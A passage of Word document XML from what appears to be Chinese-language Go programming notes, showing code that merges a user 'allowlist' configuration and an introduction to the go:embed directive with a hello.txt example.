    <w:p w14:paraId="7025B092" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70F3D37D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[allowlist] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55054564" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if user_custom_configs["allowlist"] != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4643E538" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>var tmpConfigAllowlist map[string]interface{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BD71A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
        <w:t>tmpConfigAllowlist = make(map[string]interface{})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBE0B7B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for k, v := range configs["allowlist"].(map[string]interface{}) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CB322A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>tmpConfigAllowlist[k] = v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26507636" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>//fmt.Println(k)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D3C051" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>//fmt.Println(v)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1185E74D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590742D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>user_custom_configs_allowlist := user_custom_configs["allowlist"].(map[string]interface{})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069B67EE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for k, v := range user_custom_configs_allowlist {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EECFAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if k == "paths" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA22538" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>tmpConfigAllowlist[k] = v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7ABB78" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4876DA9D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AD81B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>configs["allowlist"] = tmpConfigAllowlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25562AAA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75AF85C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AC5B8A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1440B027" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="314" w:name="_Toc159779772"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>embed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">go:embed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>嵌入文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="314"/>
    </w:p>
    <w:p w14:paraId="10B274AE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译的程序非常适合部署，如果没有通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CGO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用其它的库的话，我们一般编译出来的可执行二进制文件都是单个的文件，非常适合复制和部署。在实际使用中，除了二进制文件，可能还需要一些配置文件，或者静态文件，比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模板、静态的图片、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等文件，如何这些文件也能打进到二进制文件中，那就太美妙，我们只需复制、按照单个的可执行文件即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2932E6A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C6FA98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一些开源的项目很久以前就开始做这方面的工作，比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gobuffalo/packr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>markbates/pkger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rakyll/statik</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>knadh/stuffbin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等等，但是不管怎么说这些都是第三方提供的功能，如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方能内建支持就好了。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2019</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>末一个提案被提出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>issue#35950,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>期望</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方编译器支持嵌入静态文件。后来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Russ Cox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>专门写了一个设计文档</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Go command support for embedded static assets, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并最终实现了它。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C886AF8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="687C6616" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Go 1.16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中包含了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go embed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的功能，而且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go1.16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本在一个月左右的时间就会发布了，到时候你可以尝试使用它，如果你等不及了，你也可以下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go 1.16beta1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝鲜。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07654A77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53E65CFE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本文将通过例子，详细介绍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go embed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的各个功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478A6B18" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="243B43FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如当前文件下有个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hello.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文件，文件内容为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hello,world!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go:embed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指令，在编译后下面程序中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量的值就变为了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hello,world!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AC6408" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40864AF1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF5D6B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>_ "embed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443A27A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06102C7B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358712FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>//go:embed hello.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F08FD7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>var s string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCADE5B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC12C30" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C91332" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF20BE6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62BF733C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>嵌入为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>byte slice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B4A83A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你还可以把单个文件的内容嵌入为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>slice of byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也就是一个字节数组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA69455" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="379563DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
